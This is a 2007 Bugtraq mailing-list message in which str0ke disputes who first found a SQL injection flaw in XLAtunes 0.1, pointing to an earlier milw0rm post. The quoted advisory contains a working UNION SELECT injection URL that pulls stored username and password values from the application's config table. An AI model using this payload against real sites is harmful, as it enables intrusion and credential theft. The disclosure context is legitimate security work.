[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <814b9d50702200934i5a12a22doe66f68ff85253d24@mail.gmail.com>
Date: Tue, 20 Feb 2007 11:34:30 -0600
From: str0ke <str0ke@...w0rm.com>
To: "Guns@...0.com.ar" <Guns@...0.com.ar>
Cc: bugtraq@...urityfocus.com
Subject: Re: XLAtunes 0.1 (album) Remote SQL Injection Vulnerability
This was actually found by Bl0od3r, and was posted on the 17th. Yep
you pretty much nop'ed the found by section, nice job.
http://www.milw0rm.com/exploits/3327
/str0ke
On 19 Feb 2007 19:27:31 -0000, Guns@...0.com.ar <Guns@...0.com.ar> wrote:
> #Critical Status:High
> #Found By: 0x90 #Download:http://www.scriptdungeon.com/script.php?ScriptID=2844
> #Greetz:all my friends
> #confkey->Password
> #confvalue->Username
> #Table:config
> #http://host.com/path/?mode=view&album=-1%20UNION%20SELECT%20confkey%20FROM%20config/*
>
>
Powered by blists - more mailing lists